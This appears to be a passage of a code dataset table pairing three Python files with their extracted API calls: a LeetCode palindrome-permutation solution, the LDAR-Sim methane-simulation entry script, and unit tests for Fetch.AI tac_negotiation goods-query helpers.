code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
__source__ = 'https://leetcode.com/problems/palindrome-permutation/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/palindrome-permutation.py
# Time: O(n)
# Space: O(1)
#
# Description: Leetcode # 266. Palindrome Permutation
#
# Given a string, determine if a permutation of the string could form a palindrome.
#
# For example,
# "code" -> False, "aab" -> True, "carerac" -> True.
#
# Hint:
#
# Consider the palindromes of odd vs even length. What difference do you notice?
# Count the frequency of each character.
# If each character occurs even number of times,
# then it must be a palindrome. How about character which occurs odd number of times?
#
# #count of odd number char < 2
# Companies
# Google Uber Bloomberg
# Related Topics
# Hash Table
# Similar Questions
# Longest Palindromic Substring Valid Anagram Palindrome Permutation II Longest Palindrome
#
import unittest
import collections
# 20ms 99.07%
class Solution(object):
    def canPermutePalindrome(self, s):
        """
        :type s: str
        :rtype: bool
        """
        # A permutation of s can be rearranged into a palindrome iff at
        # most one character occurs an odd number of times.
        odd_frequencies = [cnt for cnt in collections.Counter(s).values() if cnt % 2]
        return len(odd_frequencies) < 2
# 20ms 99.07%
from collections import defaultdict
class Solution2(object):
    def canPermutePalindrome(self, s):
        """
        :type s: str
        :rtype: bool

        A permutation of s can form a palindrome iff at most one character
        occurs an odd number of times (that character sits in the middle).
        """
        # FIX: the original bound the builtin name `dict` to a local
        # defaultdict, shadowing the builtin; renamed to `counts`.
        counts = defaultdict(int)
        for char in s:
            counts[char] += 1
        odd = 0
        for cnt in counts.values():
            if cnt % 2 == 1:
                odd += 1
            if odd > 1:
                # Early exit: two odd-count characters already rule out a palindrome.
                return False
        return True
class TestMethods(unittest.TestCase):
    # Placeholder test case: only asserts a tautology so the unittest
    # harness runs; no real coverage of the solutions above.
    def test_Local(self):
        self.assertEqual(1, 1)
if __name__ == '__main__':
    # Discover and run the unittest test cases when executed as a script.
    unittest.main()
# Java solution
# NOTE: reference Java implementations and complexity notes are kept below as a
# module-level string constant; the text is documentation data and is never
# executed by this module.
Java = '''
# Thought: https://leetcode.com/problems/palindrome-permutation/solution/
#
Time complexity : O(n). We traverse over the string ss of length nn once only.
Space complexity : O(n). The setset can grow upto a maximum size of nn in case of all distinct elements.
The idea is to iterate over string, adding current character to set if set doesn't contain that character,
or removing current character from set if set contains it.
When the iteration is finished, just return set.size()==0 || set.size()==1.
set.size()==0 corresponds to the situation when there are even number of any character in the string, and
set.size()==1 corresponsds to the fact that there are even number of any character except one.
# 1ms 65.75%
class Solution {
public boolean canPermutePalindrome(String s) {
Set<Character> set=new HashSet<Character>();
for(int i=0; i<s.length(); ++i){
if (!set.contains(s.charAt(i)))
set.add(s.charAt(i));
else
set.remove(s.charAt(i));
}
return set.size()==0 || set.size()==1;
}
}
# same as above
class Solution {
public boolean canPermutePalindrome(String s) {
Set<Character> set = new HashSet();
for (int i = 0; i < s.length(); i++) {
if (!set.add(s.charAt(i))) {
set.remove(s.charAt(i));
}
}
return set.size() <= 1;
}
}
# 1ms 65.75%
class Solution {
public boolean canPermutePalindrome(String s) {
BitSet bs = new BitSet();
for (byte b : s.getBytes())
bs.flip(b);
return bs.cardinality() < 2;
}
}
# count char with boolean[128]
# 0ms 100%
class Solution {
public boolean canPermutePalindrome(String s) {
boolean[] arr = new boolean[128];
for (int i = 0; i < s.length(); i++) {
char c = s.charAt(i);
arr[c] = !arr[c];
}
boolean odd = false;
for (int i = 0; i < 128; i++) {
if (arr[i]) {
if (odd) { //2 occurrence of odd char count
return false;
} else {
odd = true;
}
}
}
return true;
}
}
# 0ms 100%
class Solution {
public boolean canPermutePalindrome(String s) {
if (s == null || s.length() == 0) return true;
int[] map = new int[128]; //or use 256 depending on encoding
int count = 0;
for (int i = 0; i < s.length(); i++) {
map[s.charAt(i)]++;
if ( (map[s.charAt(i)] & 1) == 0) { //%2 ==0
count--;
} else {
count++;
}
}
return count <= 1;
}
}
'''
| [
"unittest.main",
"collections.defaultdict",
"collections.Counter"
] | [((1764, 1779), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1777, 1779), False, 'import unittest\n'), ((1377, 1393), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (1388, 1393), False, 'from collections import defaultdict\n'), ((1144, 1166), 'collections.Counter', 'collections.Counter', (['s'], {}), '(s)\n', (1163, 1166), False, 'import collections\n')] |
# ------------------------------------------------------------------------------
# Program: The LDAR Simulator (LDAR-Sim)
# File: LDAR-Sim main
# Purpose: Interface for parameterizing and running LDAR-Sim.
#
# Copyright (C) 2018-2021 Intelligent Methane Monitoring and Management System (IM3S) Group
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the MIT License as published
# by the Free Software Foundation, version 3.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
# You should have received a copy of the MIT License
# along with this program. If not, see <https://opensource.org/licenses/MIT>.
#
# ------------------------------------------------------------------------------
import datetime
import json
import multiprocessing as mp
import os
import shutil
from pathlib import Path
from economics.cost_mitigation import cost_mitigation
from initialization.args import files_from_args, get_abs_path
from initialization.input_manager import InputManager
from initialization.sims import create_sims
from initialization.sites import init_generator_files
from ldar_sim_run import ldar_sim_run
from out_processing.batch_reporting import BatchReporting
from out_processing.prog_table import generate as gen_prog_table
from utils.generic_functions import check_ERA5_file
# Banner printed at startup: identifies the software version, license, and the
# research group maintaining it.
opening_msg = """
You are running LDAR-Sim version 2.0 an open sourced software (MIT) license.
It is continually being developed by the University of Calgary's Intelligent
Methane Monitoring and Management System (IM3S) Group.
Provide any issues, comments, questions, or recommendations to the IM3S by
adding an issue to https://github.com/LDAR-Sim/LDAR_Sim.git.
"""
if __name__ == '__main__':
    print(opening_msg)

    # Get root directory, which is the parent folder of the ldar_sim_main file,
    # and set the current working directory to it so relative paths resolve.
    root_dir = Path(os.path.dirname(os.path.realpath(__file__))).parent
    os.chdir(root_dir)

    # --- Retrieve input parameters and parse ---
    parameter_filenames = files_from_args(root_dir)
    input_manager = InputManager()
    sim_params = input_manager.read_and_validate_parameters(parameter_filenames)

    # --- Assign local variables ---
    ref_program = sim_params['reference_program']
    base_program = sim_params['baseline_program']
    in_dir = get_abs_path(sim_params['input_directory'])
    out_dir = get_abs_path(sim_params['output_directory'])
    programs = sim_params.pop('programs')

    # --- Run checks ----
    check_ERA5_file(in_dir, programs)
    has_ref = ref_program in programs
    has_base = base_program in programs

    # --- Set up output folder (recreated from scratch each run) ---
    if os.path.exists(out_dir):
        shutil.rmtree(out_dir)
    os.makedirs(out_dir)
    input_manager.write_parameters(out_dir / 'parameters.yaml')

    # If the leak generator is used and there are generated files, the user is
    # prompted to use the files; if they say no, the files will be removed.
    if sim_params['pregenerate_leaks']:
        generator_dir = in_dir / "generator"
        init_generator_files(
            generator_dir, input_manager.simulation_parameters, in_dir, programs[base_program])
    else:
        generator_dir = None

    # --- Create simulations ---
    simulations = create_sims(sim_params, programs, generator_dir, in_dir, out_dir, input_manager)

    # --- Run simulations (in parallel) --
    with mp.Pool(processes=sim_params['n_processes']) as p:
        sim_outputs = p.starmap(ldar_sim_run, simulations)

    # ---- Generate outputs ----
    print("....Generating output data")
    if sim_params['write_data']:
        # Batch reporting requires both a reference and a baseline program.
        if has_ref & has_base:
            print("....Generating cost mitigation outputs")
            # FIX: bind the result to a new name instead of shadowing the
            # imported cost_mitigation function.
            cost_mitigation_outputs = cost_mitigation(
                sim_outputs, ref_program, base_program, out_dir)
            reporting_data = BatchReporting(
                out_dir, sim_params['start_date'], ref_program, base_program)
            if sim_params['n_simulations'] > 1:
                reporting_data.program_report()
                if len(programs) > 1:
                    print("....Generating program comparison plots")
                    reporting_data.batch_report()
                    reporting_data.batch_plots()
        else:
            print('No reference or base program input...skipping batch reporting and economics.')

    # Generate output table
    print("....Exporting summary statistic tables")
    out_prog_table = gen_prog_table(sim_outputs, base_program, programs)
    with open(out_dir / 'prog_table.json', 'w') as fp:
        json.dump(out_prog_table, fp)

    # Write program metadata.
    # FIX: use a context manager so the file handle is always closed.
    with open(out_dir / '_metadata.txt', 'w') as metadata:
        metadata.write(str(programs) + '\n' +
                       str(datetime.datetime.now()))
| [
"os.path.exists",
"initialization.sims.create_sims",
"os.makedirs",
"out_processing.prog_table.generate",
"initialization.args.get_abs_path",
"json.dump",
"economics.cost_mitigation.cost_mitigation",
"out_processing.batch_reporting.BatchReporting",
"utils.generic_functions.check_ERA5_file",
"os.ch... | [((2156, 2174), 'os.chdir', 'os.chdir', (['root_dir'], {}), '(root_dir)\n', (2164, 2174), False, 'import os\n'), ((2252, 2277), 'initialization.args.files_from_args', 'files_from_args', (['root_dir'], {}), '(root_dir)\n', (2267, 2277), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2298, 2312), 'initialization.input_manager.InputManager', 'InputManager', ([], {}), '()\n', (2310, 2312), False, 'from initialization.input_manager import InputManager\n'), ((2540, 2583), 'initialization.args.get_abs_path', 'get_abs_path', (["sim_params['input_directory']"], {}), "(sim_params['input_directory'])\n", (2552, 2583), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2598, 2642), 'initialization.args.get_abs_path', 'get_abs_path', (["sim_params['output_directory']"], {}), "(sim_params['output_directory'])\n", (2610, 2642), False, 'from initialization.args import files_from_args, get_abs_path\n'), ((2716, 2749), 'utils.generic_functions.check_ERA5_file', 'check_ERA5_file', (['in_dir', 'programs'], {}), '(in_dir, programs)\n', (2731, 2749), False, 'from utils.generic_functions import check_ERA5_file\n'), ((2866, 2889), 'os.path.exists', 'os.path.exists', (['out_dir'], {}), '(out_dir)\n', (2880, 2889), False, 'import os\n'), ((2926, 2946), 'os.makedirs', 'os.makedirs', (['out_dir'], {}), '(out_dir)\n', (2937, 2946), False, 'import os\n'), ((3455, 3540), 'initialization.sims.create_sims', 'create_sims', (['sim_params', 'programs', 'generator_dir', 'in_dir', 'out_dir', 'input_manager'], {}), '(sim_params, programs, generator_dir, in_dir, out_dir, input_manager\n )\n', (3466, 3540), False, 'from initialization.sims import create_sims\n'), ((4691, 4742), 'out_processing.prog_table.generate', 'gen_prog_table', (['sim_outputs', 'base_program', 'programs'], {}), '(sim_outputs, base_program, programs)\n', (4705, 4742), True, 'from out_processing.prog_table import generate as gen_prog_table\n'), ((2899, 2921), 
'shutil.rmtree', 'shutil.rmtree', (['out_dir'], {}), '(out_dir)\n', (2912, 2921), False, 'import shutil\n'), ((3247, 3355), 'initialization.sites.init_generator_files', 'init_generator_files', (['generator_dir', 'input_manager.simulation_parameters', 'in_dir', 'programs[base_program]'], {}), '(generator_dir, input_manager.simulation_parameters,\n in_dir, programs[base_program])\n', (3267, 3355), False, 'from initialization.sites import init_generator_files\n'), ((3589, 3633), 'multiprocessing.Pool', 'mp.Pool', ([], {'processes': "sim_params['n_processes']"}), "(processes=sim_params['n_processes'])\n", (3596, 3633), True, 'import multiprocessing as mp\n'), ((4807, 4836), 'json.dump', 'json.dump', (['out_prog_table', 'fp'], {}), '(out_prog_table, fp)\n', (4816, 4836), False, 'import json\n'), ((3987, 4051), 'economics.cost_mitigation.cost_mitigation', 'cost_mitigation', (['sim_outputs', 'ref_program', 'base_program', 'out_dir'], {}), '(sim_outputs, ref_program, base_program, out_dir)\n', (4002, 4051), False, 'from economics.cost_mitigation import cost_mitigation\n'), ((4081, 4157), 'out_processing.batch_reporting.BatchReporting', 'BatchReporting', (['out_dir', "sim_params['start_date']", 'ref_program', 'base_program'], {}), "(out_dir, sim_params['start_date'], ref_program, base_program)\n", (4095, 4157), False, 'from out_processing.batch_reporting import BatchReporting\n'), ((2116, 2142), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (2132, 2142), False, 'import os\n'), ((4984, 5007), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (5005, 5007), False, 'import datetime\n')] |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the helpers module of the tac negotiation."""
from pathlib import Path
from aea.helpers.search.models import (
Attribute,
Constraint,
ConstraintType,
DataModel,
Description,
)
from aea.test_tools.test_skill import BaseSkillTestCase
from packages.fetchai.skills.tac_negotiation.helpers import (
DEMAND_DATAMODEL_NAME,
SUPPLY_DATAMODEL_NAME,
_build_goods_datamodel,
build_goods_description,
build_goods_query,
)
from tests.conftest import ROOT_DIR
class TestHelpers(BaseSkillTestCase):
    """Test Helper module methods of tac control."""

    path_to_skill = Path(ROOT_DIR, "packages", "fetchai", "skills", "tac_negotiation")

    @classmethod
    def setup(cls):
        """Setup the test class."""
        super().setup()

    @staticmethod
    def _expected_attributes(good_ids):
        """
        Build the attribute list the helpers are expected to produce.

        The original tests repeated this 7-attribute list verbatim in every
        test method; it is factored out here (order is significant: one
        attribute per good id, then the fixed transaction attributes).

        :param good_ids: ordered ids of the goods under test.
        :return: list of Attribute objects in the expected order.
        """
        attributes = [
            Attribute(good_id, int, True, "A good on offer.") for good_id in good_ids
        ]
        attributes.extend(
            [
                Attribute("ledger_id", str, True, "The ledger for transacting."),
                Attribute(
                    "currency_id",
                    str,
                    True,
                    "The currency for pricing and transacting the goods.",
                ),
                Attribute("price", int, False, "The price of the goods in the currency."),
                Attribute(
                    "fee",
                    int,
                    False,
                    "The transaction fee payable by the buyer in the currency.",
                ),
                Attribute(
                    "nonce", str, False, "The nonce to distinguish identical descriptions."
                ),
            ]
        )
        return attributes

    def test_build_goods_datamodel_supply(self):
        """Test the _build_goods_datamodel of Helpers module for a supply."""
        good_ids = ["1", "2"]
        is_supply = True
        expected_data_model = DataModel(
            SUPPLY_DATAMODEL_NAME, self._expected_attributes(good_ids)
        )

        actual_data_model = _build_goods_datamodel(good_ids, is_supply)
        assert actual_data_model == expected_data_model

    def test_build_goods_datamodel_demand(self):
        """Test the _build_goods_datamodel of Helpers module for a demand."""
        good_ids = ["1", "2"]
        is_supply = False
        expected_data_model = DataModel(
            DEMAND_DATAMODEL_NAME, self._expected_attributes(good_ids)
        )

        actual_data_model = _build_goods_datamodel(good_ids, is_supply)
        assert actual_data_model == expected_data_model

    def test_build_goods_description_supply(self):
        """Test the build_goods_description of Helpers module for supply."""
        quantities_by_good_id = {"2": 5, "3": 10}
        currency_id = "1"
        ledger_id = "some_ledger_id"
        is_supply = True

        expected_data_model = DataModel(
            SUPPLY_DATAMODEL_NAME,
            self._expected_attributes(list(quantities_by_good_id)),
        )
        expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
        expected_values.update(quantities_by_good_id)
        expected_description = Description(expected_values, expected_data_model)

        actual_description = build_goods_description(
            quantities_by_good_id, currency_id, ledger_id, is_supply
        )
        assert actual_description == expected_description

    def test_build_goods_description_demand(self):
        """Test the build_goods_description of Helpers module for demand (same as above)."""
        quantities_by_good_id = {"2": 5, "3": 10}
        currency_id = "1"
        ledger_id = "some_ledger_id"
        is_supply = False

        expected_data_model = DataModel(
            DEMAND_DATAMODEL_NAME,
            self._expected_attributes(list(quantities_by_good_id)),
        )
        expected_values = {"currency_id": currency_id, "ledger_id": ledger_id}
        expected_values.update(quantities_by_good_id)
        expected_description = Description(expected_values, expected_data_model)

        actual_description = build_goods_description(
            quantities_by_good_id, currency_id, ledger_id, is_supply
        )
        assert actual_description == expected_description

    def test_build_goods_query(self):
        """Test the build_goods_query of Helpers module."""
        good_ids = ["2", "3"]
        currency_id = "1"
        ledger_id = "some_ledger_id"
        is_searching_for_sellers = True

        expected_data_model = DataModel(
            SUPPLY_DATAMODEL_NAME, self._expected_attributes(good_ids)
        )
        expected_constraints = [
            Constraint(good_id, ConstraintType(">=", 1)) for good_id in good_ids
        ] + [
            Constraint("ledger_id", ConstraintType("==", ledger_id)),
            Constraint("currency_id", ConstraintType("==", currency_id)),
        ]

        actual_query = build_goods_query(
            good_ids, currency_id, ledger_id, is_searching_for_sellers
        )
        # The query wraps its constraints in one And; compare type/value pairs.
        constraints = [
            (c.constraint_type.type, c.constraint_type.value)
            for c in actual_query.constraints[0].constraints
        ]
        for constraint in expected_constraints:
            assert (
                constraint.constraint_type.type,
                constraint.constraint_type.value,
            ) in constraints
        assert actual_query.model == expected_data_model

    def test_build_goods_query_1_good(self):
        """Test the build_goods_query of Helpers module where there is 1 good."""
        good_ids = ["2"]
        currency_id = "1"
        ledger_id = "some_ledger_id"
        is_searching_for_sellers = True

        expected_data_model = DataModel(
            SUPPLY_DATAMODEL_NAME, self._expected_attributes(good_ids)
        )
        expected_constraints = [
            Constraint("2", ConstraintType(">=", 1)),
            Constraint("ledger_id", ConstraintType("==", ledger_id)),
            Constraint("currency_id", ConstraintType("==", currency_id)),
        ]

        actual_query = build_goods_query(
            good_ids, currency_id, ledger_id, is_searching_for_sellers
        )
        # With a single good the constraints are not nested inside an And,
        # so membership is checked directly (as in the original test).
        for constraint in expected_constraints:
            assert constraint in actual_query.constraints
        assert actual_query.model == expected_data_model
| [
"packages.fetchai.skills.tac_negotiation.helpers.build_goods_query",
"aea.helpers.search.models.DataModel",
"pathlib.Path",
"aea.helpers.search.models.ConstraintType",
"aea.helpers.search.models.Description",
"aea.helpers.search.models.Attribute",
"packages.fetchai.skills.tac_negotiation.helpers.build_g... | [((1436, 1502), 'pathlib.Path', 'Path', (['ROOT_DIR', '"""packages"""', '"""fetchai"""', '"""skills"""', '"""tac_negotiation"""'], {}), "(ROOT_DIR, 'packages', 'fetchai', 'skills', 'tac_negotiation')\n", (1440, 1502), False, 'from pathlib import Path\n'), ((2621, 2665), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (2630, 2665), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2694, 2737), 'packages.fetchai.skills.tac_negotiation.helpers._build_goods_datamodel', '_build_goods_datamodel', (['good_ids', 'is_supply'], {}), '(good_ids, is_supply)\n', (2716, 2737), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((3815, 3859), 'aea.helpers.search.models.DataModel', 'DataModel', (['DEMAND_DATAMODEL_NAME', 'attributes'], {}), '(DEMAND_DATAMODEL_NAME, attributes)\n', (3824, 3859), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3888, 3931), 'packages.fetchai.skills.tac_negotiation.helpers._build_goods_datamodel', '_build_goods_datamodel', (['good_ids', 'is_supply'], {}), '(good_ids, is_supply)\n', (3910, 3931), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((5093, 5137), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (5102, 5137), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5302, 5351), 'aea.helpers.search.models.Description', 'Description', 
(['expected_values', 'expected_data_model'], {}), '(expected_values, expected_data_model)\n', (5313, 5351), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5382, 5467), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_description', 'build_goods_description', (['quantities_by_good_id', 'currency_id', 'ledger_id', 'is_supply'], {}), '(quantities_by_good_id, currency_id, ledger_id,\n is_supply)\n', (5405, 5467), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((6666, 6710), 'aea.helpers.search.models.DataModel', 'DataModel', (['DEMAND_DATAMODEL_NAME', 'attributes'], {}), '(DEMAND_DATAMODEL_NAME, attributes)\n', (6675, 6710), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6875, 6924), 'aea.helpers.search.models.Description', 'Description', (['expected_values', 'expected_data_model'], {}), '(expected_values, expected_data_model)\n', (6886, 6924), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((6955, 7040), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_description', 'build_goods_description', (['quantities_by_good_id', 'currency_id', 'ledger_id', 'is_supply'], {}), '(quantities_by_good_id, currency_id, ledger_id,\n is_supply)\n', (6978, 7040), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((8187, 8231), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (8196, 8231), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((8552, 
8629), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_query', 'build_goods_query', (['good_ids', 'currency_id', 'ledger_id', 'is_searching_for_sellers'], {}), '(good_ids, currency_id, ledger_id, is_searching_for_sellers)\n', (8569, 8629), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((10099, 10143), 'aea.helpers.search.models.DataModel', 'DataModel', (['SUPPLY_DATAMODEL_NAME', 'attributes'], {}), '(SUPPLY_DATAMODEL_NAME, attributes)\n', (10108, 10143), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((10410, 10487), 'packages.fetchai.skills.tac_negotiation.helpers.build_goods_query', 'build_goods_query', (['good_ids', 'currency_id', 'ledger_id', 'is_searching_for_sellers'], {}), '(good_ids, currency_id, ledger_id, is_searching_for_sellers)\n', (10427, 10487), False, 'from packages.fetchai.skills.tac_negotiation.helpers import DEMAND_DATAMODEL_NAME, SUPPLY_DATAMODEL_NAME, _build_goods_datamodel, build_goods_description, build_goods_query\n'), ((1819, 1864), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""1"""', 'int', '(True)', '"""A good on offer."""'], {}), "('1', int, True, 'A good on offer.')\n", (1828, 1864), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((1878, 1923), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (1887, 1923), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((1937, 2001), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (1946, 2001), 
False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2015, 2109), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (2024, 2109), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2198, 2271), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (2207, 2271), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2285, 2378), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (2294, 2378), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((2467, 2553), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (2476, 2553), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3013, 3058), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""1"""', 'int', '(True)', '"""A good on offer."""'], {}), "('1', int, True, 'A good on offer.')\n", (3022, 3058), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3072, 3117), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 
'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (3081, 3117), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3131, 3195), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (3140, 3195), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3209, 3303), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (3218, 3303), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3392, 3465), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (3401, 3465), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3479, 3572), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the currency.')\n", (3488, 3572), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((3661, 3747), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (3670, 3747), False, 'from aea.helpers.search.models import 
Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4291, 4336), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (4300, 4336), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4350, 4395), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (4359, 4395), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4409, 4473), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for transacting."""'], {}), "('ledger_id', str, True, 'The ledger for transacting.')\n", (4418, 4473), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4487, 4581), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""currency_id"""', 'str', '(True)', '"""The currency for pricing and transacting the goods."""'], {}), "('currency_id', str, True,\n 'The currency for pricing and transacting the goods.')\n", (4496, 4581), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4670, 4743), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""price"""', 'int', '(False)', '"""The price of the goods in the currency."""'], {}), "('price', int, False, 'The price of the goods in the currency.')\n", (4679, 4743), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4757, 4850), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""fee"""', 'int', '(False)', '"""The transaction fee payable by the buyer in the currency."""'], {}), "('fee', int, False,\n 'The transaction fee payable by the buyer in the 
currency.')\n", (4766, 4850), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((4939, 5025), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""nonce"""', 'str', '(False)', '"""The nonce to distinguish identical descriptions."""'], {}), "('nonce', str, False,\n 'The nonce to distinguish identical descriptions.')\n", (4948, 5025), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5864, 5909), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""2"""', 'int', '(True)', '"""A good on offer."""'], {}), "('2', int, True, 'A good on offer.')\n", (5873, 5909), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5923, 5968), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""3"""', 'int', '(True)', '"""A good on offer."""'], {}), "('3', int, True, 'A good on offer.')\n", (5932, 5968), False, 'from aea.helpers.search.models import Attribute, Constraint, ConstraintType, DataModel, Description\n'), ((5982, 6046), 'aea.helpers.search.models.Attribute', 'Attribute', (['"""ledger_id"""', 'str', '(True)', '"""The ledger for 